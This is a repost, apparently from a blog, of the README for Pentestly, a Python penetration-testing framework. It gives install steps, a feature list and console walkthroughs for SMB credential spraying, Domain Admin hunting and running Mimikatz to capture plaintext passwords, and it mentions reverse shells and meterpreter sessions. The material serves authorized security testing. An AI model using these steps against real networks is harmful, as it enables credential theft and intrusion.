Pentestly – Python tools penetration testing

What is Pentestly?
Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.

Install
Download Pentestly:

git clone https://github.com/praetorian-inc/pentestly.git

Install and run pentestly:

./install.sh
./pentestly

Features

  • Import NMAP XML
  • Test SMB authentication using:
  • individual credentials
  • file containing credentials
  • null credentials
  • NTLM hash
  • Test local administrator privileges for successful SMB authentication
  • Identify readable SMB shares for valid credentials
  • Store Domain/Enterprise Admin account names
  • Determine location of running Domain Admin processes
  • Determine systems of logged in Domain Admins
  • Execute Powershell commands in memory and exfil results
  • Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
  • Receive a command shell (Powercat)
  • Receive a meterpreter session (Invoke-Shellcode.ps1)

Shoulders of Giants

Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

recon-ng – Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation

  • wmiexec.py – Allows us to execute Powershell commands quickly and easily via WMI

  • smbmap.py – Useful utility for enumerating SMB shares

Invoke-Mimikatz.ps1 – Implementation of Mimikatz in Powershell

Usage
Let’s walk through several functions currently implemented.

Change workspace

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Load from nmap

>load nmap
>set filename /root/PROJECT/full-all-alive.xml
>show options
>run

Test logins

Use file with creds to test login

[pentestly][default] > cat /tmp/creds
[*] Command: cat /tmp/creds
admin 123456
admin password
[pentestly][default] > load login
[pentestly][default][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][default][login] > set username ''
USERNAME => ''
[pentestly][default][login] > set password ''
PASSWORD => ''
[pentestly][default][login] > run

Use single username password

[pentestly][project]> load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Use credentials over a small subset of IPs i.e. over the 192.168.1.0/24 found in the table

[pentestly][project]> load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.1.%'

Gather Domain and Enterprise admins

>load get_domain
>show options
>run

Run mimikatz over IPs with executable rights

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Starting web server
Select local interface for hosting scripts

0. 127.0.0.1
1. 192.168.1.13
> 0

[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:password  - DOMAIN ADMIN!

Demo

Source: https://github.com/praetorian-inc/pentestly

Leave a Reply